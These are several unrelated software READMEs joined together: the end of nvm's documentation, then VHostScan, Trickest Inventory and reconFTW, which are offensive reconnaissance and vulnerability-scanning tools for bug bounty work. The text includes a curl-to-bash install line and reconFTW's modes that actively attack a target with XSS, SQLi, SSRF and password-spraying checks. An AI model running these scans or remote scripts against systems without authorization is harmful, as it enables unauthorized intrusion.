to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ## Running tests Tests are written in [Urchin]. Install Urchin (and other dependencies) like so: npm install There are slow tests and fast tests. The slow tests do things like install node and check that the right versions are used. The fast tests fake this to test things like aliases and uninstalling. From the root of the nvm git repository, run the fast tests like this: npm run test/fast Run the slow tests like this: npm run test/slow Run all of the tests like this: npm test Nota bene: Avoid running nvm while the tests are running. ## Bash completion To activate, you need to source `bash_completion`: ```sh [[ -r $NVM_DIR/bash_completion ]] && \. $NVM_DIR/bash_completion ``` Put the above sourcing line just below the sourcing line for nvm in your profile (`.bashrc`, `.bash_profile`). ### Usage nvm: > $ nvm <kbd>Tab</kbd> ``` alias deactivate install ls run unload clear-cache exec list ls-remote unalias use current help list-remote reinstall-packages uninstall version ``` nvm alias: > $ nvm alias <kbd>Tab</kbd> ``` default ``` > $ nvm alias my_alias <kbd>Tab</kbd> ``` v0.6.21 v0.8.26 v0.10.28 ``` nvm use: > $ nvm use <kbd>Tab</kbd> ``` my_alias default v0.6.21 v0.8.26 v0.10.28 ``` nvm uninstall: > $ nvm uninstall <kbd>Tab</kbd> ``` my_alias default v0.6.21 v0.8.26 v0.10.28 ``` ## Compatibility Issues `nvm` will encounter some issues if you have some non-default settings set. (see [#606](/../../issues/606)) The following are known to cause issues: Inside `~/.npmrc`: ```sh prefix='some/path' ``` Environment Variables: ```sh $NPM_CONFIG_PREFIX $PREFIX ``` Shell settings: ```sh set -e ``` ## Installing nvm on Alpine Linux In order to provide the best performance (and other optimisations), nvm will download and install pre-compiled binaries for Node (and npm) when you run `nvm install X`. The Node project compiles, tests and hosts/provides pre-these compiled binaries which are built for mainstream/traditional Linux distributions (such as Debian, Ubuntu, CentOS, RedHat et al). Alpine Linux, unlike mainstream/traditional Linux distributions, is based on [busybox](https://www.busybox.net/), a very compact (~5MB) Linux distribution. Busybox (and thus Alpine Linux) uses a different C/C++ stack to most mainstream/traditional Linux distributions - [musl](https://www.musl-libc.org/). This makes binary programs built for such mainstream/traditional incompatible with Alpine Linux, thus we cannot simply `nvm install X` on Alpine Linux and expect the downloaded binary to run correctly - you'll likely see "...does not exist" errors if you try that. There is a `-s` flag for `nvm install` which requests nvm download Node source and compile it locally. If installing nvm on Alpine Linux *is* still what you want or need to do, you should be able to achieve this by running the following from you Alpine Linux shell: ```sh apk add -U curl bash ca-certificates openssl ncurses coreutils python2 make gcc g++ libgcc linux-headers grep util-linux binutils findutils curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.8/install.sh | bash ``` The Node project has some desire but no concrete plans (due to the overheads of building, testing and support) to offer Alpine-compatible binaries. As a potential alternative, @mhart (a Node contributor) has some [Docker images for Alpine Linux with Node and optionally, npm, pre-installed](https://github.com/mhart/alpine-node). ## Docker for development environment To make the development and testing work easier, we have a Dockerfile for development usage, which is based on Ubuntu 14.04 base image, prepared with essential and useful tools for `nvm` development, to build the docker image of the environment, run the docker command at the root of `nvm` repository: ```sh $ docker build -t nvm-dev . ``` This will package your current nvm repository with our pre-defiend development environment into a docker image named `nvm-dev`, once it's built with success, validate your image via `docker images`: ```sh $ docker images REPOSITORY TAG IMAGE ID CREATED SIZE nvm-dev latest 9ca4c57a97d8 7 days ago 650 MB ``` If you got no error message, now you can easily involve in: ```sh $ docker run -it nvm-dev -h nvm-dev nvm@nvm-dev:~/.nvm$ ``` Please note that it'll take about 8 minutes to build the image and the image size would be about 650MB, so it's not suitable for production usage. For more information and documentation about docker, please refer to its official website: - https://www.docker.com/ - https://docs.docker.com/ ## Problems - If you try to install a node version and the installation fails, be sure to delete the node downloads from src (`~/.nvm/src/`) or you might get an error when trying to reinstall them again or you might get an error like the following: curl: (33) HTTP server doesn't seem to support byte ranges. Cannot resume. - Where's my `sudo node`? Check out [#43](https://github.com/creationix/nvm/issues/43) - After the v0.8.6 release of node, nvm tries to install from binary packages. But in some systems, the official binary packages don't work due to incompatibility of shared libs. In such cases, use `-s` option to force install from source: ```sh nvm install -s 0.8.6 ``` - If setting the `default` alias does not establish the node version in new shells (i.e. `nvm current` yields `system`), ensure that the system's node `PATH` is set before the `nvm.sh` source line in your shell profile (see [#658](https://github.com/creationix/nvm/issues/658)) ## Mac OS "troubleshooting" **nvm node version not found in vim shell** If you set node version to a version other than your system node version `nvm use 6.2.1` and open vim and run `:!node -v` you should see `v6.2.1` if you see your system version `v0.12.7`. You need to run: ```shell sudo chmod ugo-x /usr/libexec/path_helper ``` More on this issue in [dotphiles/dotzsh](https://github.com/dotphiles/dotzsh#mac-os-x). [1]: https://github.com/creationix/nvm.git [2]: https://github.com/creationix/nvm/blob/v0.33.8/install.sh [3]: https://travis-ci.org/creationix/nvm [4]: https://github.com/creationix/nvm/releases/tag/v0.33.8 [Urchin]: https://github.com/scraperwiki/urchin [Fish]: http://fishshell.com
# VHostScan A virtual host scanner that can be used with pivot tools, detect catch-all scenarios, aliases and dynamic default pages. First presented at SecTalks BNE in September 2017 ([slidedeck](https://docs.google.com/presentation/d/1KDY7bnCpCGabJn8UpmHGSb6z_hi_WGf3ETxzykTNjWY)). [![Build Status](https://travis-ci.org/codingo/VHostScan.svg?branch=master)](https://travis-ci.org/codingo/VHostScan) [![Python 3.2|3.6](https://img.shields.io/badge/python-3.2|3.6-green.svg)](https://www.python.org/) [![PEP8](https://img.shields.io/badge/code%20style-pep8-orange.svg)](https://www.python.org/dev/peps/pep-0008/) [![License](https://img.shields.io/badge/license-GPL3-_red.svg)](https://www.gnu.org/licenses/gpl-3.0.en.html) [![Twitter](https://img.shields.io/badge/twitter-@____timk-blue.svg)](https://twitter.com/__timk) [![Twitter](https://img.shields.io/badge/twitter-@codingo__-blue.svg)](https://twitter.com/codingo_) ## Key Benefits * Quickly highlight unique content in catch-all scenarios * Locate the outliers in catch-all scenarios where results have dynamic content on the page (such as the time) * Identify aliases by tweaking the unique depth of matches * Wordlist supports standard words and a variable to input a base hostname (for e.g. dev.%s from the wordlist would be run as dev.BASE_HOST) * Works over HTTP and HTTPS * Ability to set the real port of the webserver to use in headers when pivoting through ssh/nc * Add simple response headers to bypass some WAF products * Identify new targets by using reverse lookups and append to wordlist ## Product Comparisons ![VHOSTScan Feature Map](https://github.com/codingo/codingo.github.io/blob/master/assets/featureMap.PNG) # Install Requirements Install using: ```bash $ python3 setup.py install ``` Dependencies will then be installed and VHostScan will be added to your path. If there is an issue regarding running `python3 setup.py build_ext`, you will need to reinstall `numpy` using `pip uninstall numpy` and `pip install numpy==1.12.0`. This should resolve the issue as there are sometimes issues with numpy being installed through setup.py. # Usage | Argument | Description | | ------------- |:-------------| | -h, --help | Display help message and exit | | -t TARGET_HOSTS | Set the target host. | | -b BASE_HOST | Set host to be used during substitution in wordlist (default to TARGET).| | -w WORDLISTS | Set the wordlist(s) to use. You may specify multiple wordlists in comma delimited format (e.g. -w "./wordlists/simple.txt, ./wordlists/hackthebox.txt" (default ./wordlists/virtual-host-scanning.txt). | | -p PORT | Set the port to use (default 80). | | -r REAL_PORT | The real port of the webserver to use in headers when not 80 (see RFC2616 14.23), useful when pivoting through ssh/nc etc (default to PORT). | | --ignore-http-codes IGNORE_HTTP_CODES | Comma separated list of http codes to ignore with virtual host scans (default 404). | | --ignore-content-length IGNORE_CONTENT_LENGTH | Ignore content lengths of specificed amount. | | --prefix PREFIX | Add a prefix to each item in the wordlist, to add dev-\<word\>, test-\<word\> etc | | --suffix SUFFIX | Add a suffix to each item in the wordlist, to add \<word\>dev, \<word\>dev | | --first-hit | Return first successful result. Only use in scenarios where you are sure no catch-all is configured (such as a CTF). | | --unique-depth UNIQUE_DEPTH | Show likely matches of page content that is found x times (default 1). | | --ssl | If set then connections will be made over HTTPS instead of HTTP. | | --fuzzy-logic | If set then all unique content replies are compared and a similarity ratio is given for each pair. This helps to isolate vhosts in situations where a default page isn't static (such as having the time on it). | | --no-lookups | Disbale reverse lookups (identifies new targets and append to wordlist, on by default). | | --rate-limit | Amount of time in seconds to delay between each scan (default 0). | | --random-agent | If set, each scan will use a random user-agent from a predefined list. | | --user-agent | Specify a user agent to use for scans. | | --waf | If set then simple WAF bypass headers will be sent. | | -oN OUTPUT_NORMAL | Normal output printed to a file when the -oN option is specified with a filename argument. | | -oG OUTPUT_GREPABLE | Grepable output printed to a file when the -oG is specified with a filename argument. | | -oJ OUTPUT_JSON | JSON output printed to a file when the -oJ option is specified with a filename argument. | | -v VERBOSE | Increase the output of the tool to show progress | ## Usage Examples _Note that a number of these examples reference 10.10.10.29. This IP refers to BANK.HTB, a retired target machine from HackTheBox (https://www.hackthebox.eu/)._ ### Quick Example The most straightforward example runs the default wordlist against example.com using the default of port 80: ```bash $ VHostScan -t example.com ``` ### Quick Example with SSL If your connection requires SSL, you can use: ```bash $ VHostScan -t example.com --ssl ``` ![VHOSTScan Wordlist example](https://github.com/codingo/codingo.github.io/blob/master/assets/Bank%20VHOST%20Example.png) ### Port forwarding Say you have an SSH port forward listening on port 4444 fowarding traffic to port 80 on example.com's development machine. You could use the following to make VHostScan connect through your SSH tunnel via localhost:4444 but format the header requests to suit connecting straight to port 80: ```bash $ VHostScan -t localhost -b example.com -p 4444 -r 80 ``` ### STDIN VHostScan Supports piping from other applications and will treat information passed to VHostScan as wordlist data, for example: ```bash $ cat bank.htb | VHostScan -t 10.10.10.29 ``` ![VHOSTScan STDIN Example](https://github.com/codingo/codingo.github.io/blob/master/assets/Bank%20VHOST%20Pipe%20Example.png) ### STDIN and WordList You can still specify a wordlist to use along with stdin. In these cases wordlist information will be appended to stdin. For example: ```bash $ echo -e 'a.example.com\b.example.com' | VHostScan -t localhost -w ./wordlists/wordlist.txt ``` ### Fuzzy Logic Here is an example with fuzzy logic enabled. You can see the last comparison is much more similar than the first two (it is comparing the content not the actual hashes): ![VHOSTScan Fuzzy Logic Example](https://github.com/codingo/codingo.github.io/blob/master/assets/VHostScan-Fuzzy-Wuzzy.PNG) ## Running the tests The project includes a small battery of tests. It's really simple to run the tests: ```bash pip install -r test-requirements.txt pytest ``` Or you can optionally run: ```bash pip install -r test-requirements.txt python3 setup.py test ``` If you're thinking of adding a new feature to the project, consider also contributing with a couple of tests. A well-tested codebase is a sane codebase. :)
<h1 align="center">Inventory <a href="https://twitter.com/intent/tweet?text=Inventory%20-%20Asset%20Inventory%20of%20public%20bug%20bounty%20programs.%20https://github.com/trickest/inventory%20by%20%40trick3st&hashtags=security,bugbounty,bugbountytips,assets,infosec,cybersecurity,recon,reconnaissance"><img src="https://img.shields.io/badge/Tweet--lightgrey?logo=twitter&style=social" alt="Tweet" height="20"/></a></h1> <h3 align="center">Attack Surface Management of public bug bounty programs.</h3> The data we collect here includes DNS and Web Server data of public bug bounty programs. Our aim with this project is to: - Monitor [over 800](targets.json) companies for new assets - help bug bounty hunters get up and running on new programs as quickly as possible. - give security teams better visibility into their assets. - reduce the load and noise that some programs face from automated tools (we run them on schedule, and give the results to everyone) [<img src="screenshots/banner.png" />](https://trickest-access.paperform.co/) ## How it works The setup consists of two workflows * Inventory 3.0 - Targets * Inventory 3.0 ### Inventory 3.0 - Targets This workflow streamlines the consolidation of bug bounty program data from various sources, ensuring a comprehensive and organized view. Let's break it down: 1. **Data collection**: The workflow fetches data from two important sources: - [Bounty Targets Data](https://github.com/arkadiyt/bounty-targets-data): This repository contains a wealth of bug bounty program information. - [Chaos Public Bug Bounty Programs](https://github.com/projectdiscovery/public-bugbounty-programs): It provides additional valuable bug bounty program data. 2. **Data transformation**: The collected data undergoes transformation using Python scripts. The scripts convert the data into a specific format, ensuring consistency and ease of analysis. You can find the detailed data format in the [targets.json](targets.json) file. 3. **Program merging**: To avoid duplication, the workflow merges programs with the same URL together. This consolidation eliminates redundancies and presents a unified view of bug bounty programs. 4. **Community program inclusion**: The workflow incorporates an additional set of programs from the [community.json](community.json) file. These programs are merged with the existing dataset, enhancing its coverage and diversity. 5. **Final output**: The workflow generates a final consolidated JSON file, [targets.json](targets.json), which encompasses all the merged bug bounty program data. This file serves as a valuable resource for bug bounty researchers, providing a centralized and comprehensive view of programs. ![Trickest Targets](screenshots/inventory-3.0-targets.png) **Note**: The screenshot above provides a visual representation of the workflow. ### Inventory 3.0 1. **Gathering the tagets**: Get the list of domains from [targets.json](targets.json), and extract program names. 2. **Making workflow run in parallel**: Extracted program names are connected `file-splitter` node to make the whole workflow distributed per program ![Trickest Parsing Targets](screenshots/inventory-3.0-parsing-targets.png) 3. **Passive Enumeration**: * Use [subfinder](https://github.com/projectdiscovery/subfinder), [vita](https://github.com/junnlikestea/vita), [findomain](https://github.com/Findomain/Findomain) to get passive enumeration data. * Use [mksub](https://github.com/trickest/mksub) to create a custom list of potential subdomains * Resolve with [puredns](https://github.com/d3mondev/puredns) and [trickest resolvers](https://github.com/trickest/resolvers) * Generate custom-wordlists from passive results with custom bash script ![Trickest Passive Enumeration](screenshots/inventory-3.0-passive.png) 4. **Active Enumeration** * Use passive enumeration data and create a new bruteforce wordlist * Use [dsieve](https://github.com/trickest/dsieve) to get environments per subdomain level * Generate new potential subdomains with [mksub](https://github.com/trickest/mksub) and custom wordlist, with additional [level2.txt wordlist](https://github.com/trickest/wordlists/blob/main/inventory/levels/level2.txt) * Resolve again with [puredns](https://github.com/d3mondev/puredns) ![Trickest Active Enumeration](screenshots/inventory-3.0-environments.png) 5. **Permutations** * Merge active and passive results from previous steps * Extract environments per subdomain level again * Use [alterx](https://github.com/projectdiscovery/alterx) to generate permutations and resolve with [puredns](https://github.com/d3mondev/puredns) ![Trickest Permutations](screenshots/inventory-3.0-permutations.png) 6. **Collecting previous results** * Use python script that will get all of the previous `hostnames.txt` per program * Use [anew](https://github.com/tomnomnom/anew) to get the new hostnames found * zip active, passive, permutations per program to be pushed to repository ![Trickest Previous Results](screenshots/inventory-3.0-previous-results.png) 7. **Reporting** * Use [dnsx](https://github.com/projectdiscovery/dnsx) to resolve found hostnames and python script for `dns-report.csv`; mark newly found domains coming from [anew](https://github.com/tomnomnom/anew) with `[x]` * Use [httpx](https://github.com/projectdiscovery/httpx) to gather web servers and python script for `server-report.csv * Push to the repository ![Trickest Reporting](screenshots/inventory-3.0-reporting.png "Trickest Workflow - Inventory 3.0 - Targets") ### Final workflow ![Trickest Inventory 3.0 Workflow](screenshots/inventory-3.0.png "Trickest Workflow - Inventory 3.0 - Targets") --- > **Note**: As described, almost everything in this repository is generated automatically. We carefully designed the workflows (and continue to develop them) to ensure the results are as accurate as possible. ## Contribution All contributions/ideas/suggestions are welcome! If you want to add/edit a target/workflow, feel free to send us a PR with new targets through [community.json](community.json), tweet at us [@trick3st](https://twitter.com/trick3st), or join the conversation on [Discord](https://discord.gg/7HZmFYTGcQ). ## Build your own workflows! We believe in the value of tinkering. Sign up for a demo on [trickest.com](https://trickest.com) to customize this workflow to your use case, get access to many more workflows, or build your own from scratch! [<img src="screenshots/banner.png" />](https://trickest-access.paperform.co/)
<h1 align="center"> <br> <a href="https://github.com/six2dez/reconftw"><img src="https://github.com/six2dez/reconftw/blob/main/images/banner.png" alt="reconftw"></a> <br> reconFTW <br> </h1> <p align="center"> <a href="https://github.com/six2dez/reconftw/releases/tag/v2.3.2"> <img src="https://img.shields.io/badge/release-v2.3.2-green"> </a> </a> <a href="https://www.gnu.org/licenses/gpl-3.0.en.html"> <img src="https://img.shields.io/badge/license-GPL3-_red.svg"> </a> <a href="https://twitter.com/Six2dez1"> <img src="https://img.shields.io/badge/twitter-%40Six2dez1-blue"> </a> <a href="https://github.com/six2dez/reconftw/issues?q=is%3Aissue+is%3Aclosed"> <img src="https://img.shields.io/github/issues-closed-raw/six2dez/reconftw.svg"> </a> <a href="https://github.com/six2dez/reconftw/wiki"> <img src="https://img.shields.io/badge/doc-wiki-blue.svg"> </a> <a href="https://t.me/joinchat/H5bAaw3YbzzmI5co"> <img src="https://img.shields.io/badge/[email protected]"> </a> <a href="https://hub.docker.com/r/six2dez/reconftw"> <img alt="Docker Cloud Build Status" src="https://img.shields.io/docker/cloud/build/six2dez/reconftw"> </a> </p> <h3 align="center">Summary</h3> **ReconFTW** automates the entire process of reconnaisance for you. It outperforms the work of subdomain enumeration along with various vulnerability checks and obtaining maximum information about your target. ReconFTW uses lot of techniques (passive, bruteforce, permutations, certificate transparency, source code scraping, analytics, DNS records...) for subdomain enumeration which helps you getting the maximum and the most interesting subdomains so that you be ahead of the competition. It also performs various vulnerability checks like XSS, Open Redirects, SSRF, CRLF, LFI, SQLi, SSL tests, SSTI, DNS zone transfers, and much more. Along with these, it performs OSINT techniques, directory fuzzing, dorking, ports scanning, screenshots, nuclei scan on your target. So, what are you waiting for Go! Go! Go! :boom: 📔 Table of Contents ----------------- - [💿 Installation:](#-installation) - [a) In your PC/VPS/VM](#a-in-your-pcvpsvm) - [b) Docker Image 🐳 (3 options)](#b-docker-image--3-options) - [c) Terraform + Ansible](#c-terraform--ansible) - [⚙️ Config file:](#️-config-file) - [Usage:](#usage) - [Example Usage:](#example-usage) - [Axiom Support: :cloud:](#axiom-support-cloud) - [BBRF Support: :computer:](#bbrf-support-computer) - [Sample video:](#sample-video) - [:fire: Features :fire:](#fire-features-fire) - [Osint](#osint) - [Subdomains](#subdomains) - [Hosts](#hosts) - [Webs](#webs) - [Extras](#extras) - [Mindmap/Workflow](#mindmapworkflow) - [Data Keep](#data-keep) - [Main commands:](#main-commands) - [How to contribute:](#how-to-contribute) - [Need help? :information_source:](#need-help-information_source) - [Support this project](#support-this-project) - [Buymeacoffee](#buymeacoffee) - [DigitalOcean referral link](#digitalocean-referral-link) - [GitHub sponsorship](#github-sponsorship) - [Sponsors ❤️](#sponsors-️) - [Thanks :pray:](#thanks-pray) - [Disclaimer](#disclaimer) --- # 💿 Installation: ## a) In your PC/VPS/VM > You can check out our wiki for the installation guide [Installation Guide](https://github.com/six2dez/reconftw/wiki/0.-Installation-Guide) :book: - Requires [Golang](https://golang.org/dl/) > **1.15.0+** installed and paths correctly set (**$GOPATH**, **$GOROOT**) ```bash git clone https://github.com/six2dez/reconftw cd reconftw/ ./install.sh ./reconftw.sh -d target.com -r ``` ## b) Docker Image 🐳 (3 options) - Pull the image ```bash $ docker pull six2dez/reconftw:main ``` - Run the container ``` $ docker run -it --rm \ -v "${PWD}/OutputFolder/":'/reconftw/Recon/' \ six2dez/reconftw:main -d example.com -r ``` However, if you wish to: 1. Dynamically modify the behaviour & function of the image 2. Build your own container 3. Build an Axiom Controller on top of the official image Please refer to the [Docker](https://github.com/six2dez/reconftw/wiki/4.-Docker) documentation. ## c) Terraform + Ansible Yes! reconFTW can also be easily deployed with Terraform and Ansible to AWS, if you want to know how to do it, you can check the guide [here](Terraform/README.md) # ⚙️ Config file: > A detailed explaintion of config file can be found here [Configuration file](https://github.com/six2dez/reconftw/wiki/3.-Configuration-file) :book: - Through ```reconftw.cfg``` file the whole execution of the tool can be controlled. - Hunters can set various scanning modes, execution preferences, tools, config files, APIs/TOKENS, personalized wordlists and much more. <details> <br><br> <summary> :point_right: Click here to view default config file :point_left: </summary> ```yaml ################################################################# # reconFTW config file # ################################################################# # General values tools=~/Tools SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )" profile_shell=".$(basename $(echo $SHELL))rc" reconftw_version=$(git rev-parse --abbrev-ref HEAD)-$(git describe --tags) generate_resolvers=false proxy_url="http://127.0.0.1:8080/" #dir_output=/custom/output/path # Golang Vars (Comment or change on your own) export GOROOT=/usr/local/go export GOPATH=$HOME/go export PATH=$GOPATH/bin:$GOROOT/bin:$HOME/.local/bin:$PATH # Tools config files #NOTIFY_CONFIG=~/.config/notify/provider-config.yaml # No need to define AMASS_CONFIG=~/.config/amass/config.ini GITHUB_TOKENS=${tools}/.github_tokens #CUSTOM_CONFIG=custom_config_path.txt # In case you use a custom config file, uncomment this line and set your files path # APIs/TOKENS - Uncomment the lines you want removing the '#' at the beginning of the line #SHODAN_API_KEY="XXXXXXXXXXXXX" #WHOISXML_API="XXXXXXXXXX" #XSS_SERVER="XXXXXXXXXXXXXXXXX" #COLLAB_SERVER="XXXXXXXXXXXXXXXXX" #slack_channel="XXXXXXXX" #slack_auth="xoXX-XXX-XXX-XXX" # File descriptors DEBUG_STD="&>/dev/null" DEBUG_ERROR="2>/dev/null" # Osint OSINT=true GOOGLE_DORKS=true GITHUB_DORKS=true METADATA=true EMAILS=true DOMAIN_INFO=true IP_INFO=true METAFINDER_LIMIT=20 # Max 250 # Subdomains SUBDOMAINS_GENERAL=true SUBPASSIVE=true SUBCRT=true SUBANALYTICS=true SUBBRUTE=true SUBSCRAPING=true SUBPERMUTE=true SUBTAKEOVER=true SUBRECURSIVE=true SUB_RECURSIVE_PASSIVE=false # Uses a lot of API keys queries SUB_RECURSIVE_BRUTE=false # Needs big disk space and time to resolve ZONETRANSFER=true S3BUCKETS=true REVERSE_IP=false TLS_PORTS="21,22,25,80,110,135,143,261,271,324,443,448,465,563,614,631,636,664,684,695,832,853,854,990,993,989,990,992,993,994,995,1129,1131,1184,2083,2087,2089,2096,2221,2252,2376,2381,2478,2479,2482,2484,2679,2762,3077,3078,3183,3191,3220,3269,3306,3410,3424,3471,3496,3509,3529,3539,3535,3660,36611,3713,3747,3766,3864,3885,3995,3896,4031,4036,4062,4064,4081,4083,4116,4335,4336,4536,4590,4740,4843,4843,4849,5443,5007,5061,5321,5349,5671,5783,5868,5986,5989,5990,6209,6251,6443,6513,6514,6619,6697,6771,6697,7202,7443,7673,7674,7677,7775,8243,8443,8991,8989,9089,9295,9318,9443,9444,9614,9802,10161,10162,11751,12013,12109,14143,15002,16995,41230,16993,20003" # Web detection WEBPROBESIMPLE=true WEBPROBEFULL=true WEBSCREENSHOT=true VIRTUALHOSTS=true UNCOMMON_PORTS_WEB="81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9092,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672" # You can change to aquatone if gowitness fails, comment the one you don't want AXIOM_SCREENSHOT_MODULE=webscreenshot # Choose between aquatone,gowitness,webscreenshot # Host FAVICON=true PORTSCANNER=true PORTSCAN_PASSIVE=true PORTSCAN_ACTIVE=true CDN_IP=true # Web analysis WAF_DETECTION=true NUCLEICHECK=true NUCLEI_SEVERITY="info,low,medium,high,critical" URL_CHECK=true URL_GF=true URL_EXT=true JSCHECKS=true FUZZ=true CMS_SCANNER=true WORDLIST=true ROBOTSWORDLIST=true PASSWORD_DICT=true PASSWORD_MIN_LENGTH=5 PASSWORD_MAX_LENGTH=14 # Vulns VULNS_GENERAL=false XSS=true CORS=true TEST_SSL=true OPEN_REDIRECT=true SSRF_CHECKS=true CRLF_CHECKS=true LFI=true SSTI=true SQLI=true BROKENLINKS=true SPRAY=true COMM_INJ=true PROTO_POLLUTION=true # Extra features NOTIFICATION=false # Notification for every function SOFT_NOTIFICATION=false # Only for start/end DEEP=false DEEP_LIMIT=500 DEEP_LIMIT2=1500 DIFF=false REMOVETMP=false REMOVELOG=false PROXY=false SENDZIPNOTIFY=false PRESERVE=true # set to true to avoid deleting the .called_fn files on really large scans FFUF_FLAGS="-mc all -fc 404 -ac -sf -s" # HTTP options HEADER="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0" # Threads FFUF_THREADS=40 HTTPX_THREADS=50 HTTPX_UNCOMMONPORTS_THREADS=100 GOSPIDER_THREADS=20 BRUTESPRAY_THREADS=20 BRUTESPRAY_CONCURRENCE=10 GAU_THREADS=10 DNSTAKE_THREADS=100 DALFOX_THREADS=200 PUREDNS_PUBLIC_LIMIT=0 # Set between 2000 - 10000 if your router blows up, 0 is unlimited PUREDNS_TRUSTED_LIMIT=400 PUREDNS_WILDCARDTEST_LIMIT=30 PUREDNS_WILDCARDBATCH_LIMIT=1500000 WEBSCREENSHOT_THREADS=200 GOWITNESS_THREADS=8 RESOLVE_DOMAINS_THREADS=150 PPFUZZ_THREADS=30 DNSVALIDATOR_THREADS=200 INTERLACE_THREADS=10 TLSX_THREADS=1000 # Rate limits HTTPX_RATELIMIT=150 NUCLEI_RATELIMIT=150 FFUF_RATELIMIT=0 # Timeouts CMSSCAN_TIMEOUT=3600 FFUF_MAXTIME=900 # Seconds HTTPX_TIMEOUT=10 # Seconds HTTPX_UNCOMMONPORTS_TIMEOUT=10 # Seconds # lists fuzz_wordlist=${tools}/fuzz_wordlist.txt lfi_wordlist=${tools}/lfi_wordlist.txt ssti_wordlist=${tools}/ssti_wordlist.txt subs_wordlist=${tools}/subdomains.txt subs_wordlist_big=${tools}/subdomains_big.txt resolvers=${tools}/resolvers.txt resolvers_trusted=${tools}/resolvers_trusted.txt # Axiom Fleet # Will not start a new fleet if one exist w/ same name and size (or larger) # AXIOM=false Uncomment only to overwrite command line flags AXIOM_FLEET_LAUNCH=false AXIOM_FLEET_NAME="reconFTW" AXIOM_FLEET_COUNT=5 AXIOM_FLEET_REGIONS="eu-central" AXIOM_FLEET_SHUTDOWN=true # This is a script on your reconftw host that might prep things your way... #AXIOM_POST_START="~/Tools/axiom_config.sh" AXIOM_EXTRA_ARGS="" # Leave empty if you don't want to add extra arguments #AXIOM_EXTRA_ARGS="--rm-logs" # Example # BBRF BBRF_CONNECTION=false BBRF_SERVER=https://demo.bbrf.me/bbrf BBRF_USERNAME="user" BBRF_PASSWORD="password" # TERM COLORS bred='\033[1;31m' bblue='\033[1;34m' bgreen='\033[1;32m' byellow='\033[1;33m' red='\033[0;31m' blue='\033[0;34m' green='\033[0;32m' yellow='\033[0;33m' reset='\033[0m' ``` </details> # Usage: > Check out the wiki section to know which flag performs what all steps/attacks [Usage Guide](https://github.com/six2dez/reconftw/wiki/2.-Usage-Guide) :book: **TARGET OPTIONS** | Flag | Description | |------|-------------| | -d | Single Target domain *(example.com)* | | -l | List of targets *(one per line)* | | -m | Multiple domain target *(companyName)* | | -x | Exclude subdomains list *(Out Of Scope)* | | -i | Include subdomains list *(In Scope)* | **MODE OPTIONS** | Flag | Description | |------|-------------| | -r | Recon - Full recon process (without attacks like sqli,ssrf,xss,ssti,lfi etc.) | | -s | Subdomains - Perform only subdomain enumeration, web probing, subdomain takeovers | | -p | Passive - Perform only passive steps | | -a | All - Perform whole recon and all active attacks | | -w | Web - Perform only vulnerability checks/attacks on particular target | | -n | OSINT - Performs an OSINT scan (no subdomain enumeration and attacks) | | -c | Custom - Launches specific function against target | | -h | Help - Show this help menu | **GENERAL OPTIONS** | Flag | Description | |------|-------------| | --deep | Deep scan (Enable some slow options for deeper scan, _vps intended mode_) | | -f | Custom config file path | | -o | Output directory | | -v | Axiom distributed VPS | | -q | Rate limit in requests per second | # Example Usage: **To perform a full recon on single target** ```bash ./reconftw.sh -d target.com -r ``` **To perform a full recon on a list of targets** ```bash ./reconftw.sh -l sites.txt -r -o /output/directory/ ``` **Perform full recon with more time intense tasks** *(VPS intended only)* ```bash ./reconftw.sh -d target.com -r --deep -o /output/directory/ ``` **Perform recon in a multi domain target** ```bash ./reconftw.sh -m company -l domains_list.txt -r ``` **Perform recon with axiom integration** ```bash ./reconftw.sh -d target.com -r -v ``` **Perform all steps (whole recon + all attacks) a.k.a. YOLO mode** ```bash ./reconftw.sh -d target.com -a ``` **Show help section** ```bash ./reconftw.sh -h ``` # Axiom Support: :cloud: ![](https://i.ibb.co/Jzrgkqt/axiom-readme.png) > Check out the wiki section for more info [Axiom Support](https://github.com/six2dez/reconftw/wiki/5.-Axiom-version) * As reconFTW actively hits the target with a lot of web traffic, hence there was a need to move to Axiom distributing the work load among various instances leading to reduction of execution time. * During the configuration of axiom you need to select `reconftw` as provisoner. * You can create your own axiom's fleet before running reconFTW or let reconFTW to create and destroy it automatically just modifying reconftw.cfg file. # BBRF Support: :computer: * To add reconFTW results to your [BBRF instance](https://github.com/honoki/bbrf-server) just add IP and credentials on reconftw.cfg file section dedicated to bbrf. * During the execution of the scans the results will be added dinamically when each step ends. * Even you can set up locally your BBRF instance to be able to visualize your results in a fancy web UI. # Sample video: ![Video](images/reconFTW.gif) # :fire: Features :fire: ## Osint - Domain information ([whois](https://github.com/rfc1036/whois) and [amass](https://github.com/OWASP/Amass)) - Emails addresses and users ([theHarvester](https://github.com/laramies/theHarvester) and [emailfinder](https://github.com/Josue87/EmailFinder)) - Password leaks ([pwndb](https://github.com/davidtavarez/pwndb) and [H8mail](https://github.com/khast3x/h8mail)) - Metadata finder ([MetaFinder](https://github.com/Josue87/MetaFinder)) - Google Dorks ([dorks_hunter](https://github.com/six2dez/dorks_hunter)) - Github Dorks ([gitdorks_go](https://github.com/damit5/gitdorks_go)) ## Subdomains - Passive ([amass](https://github.com/OWASP/Amass) and [github-subdomains](https://github.com/gwen001/github-subdomains)) - Certificate transparency ([ctfr](https://github.com/UnaPibaGeek/ctfr)) - 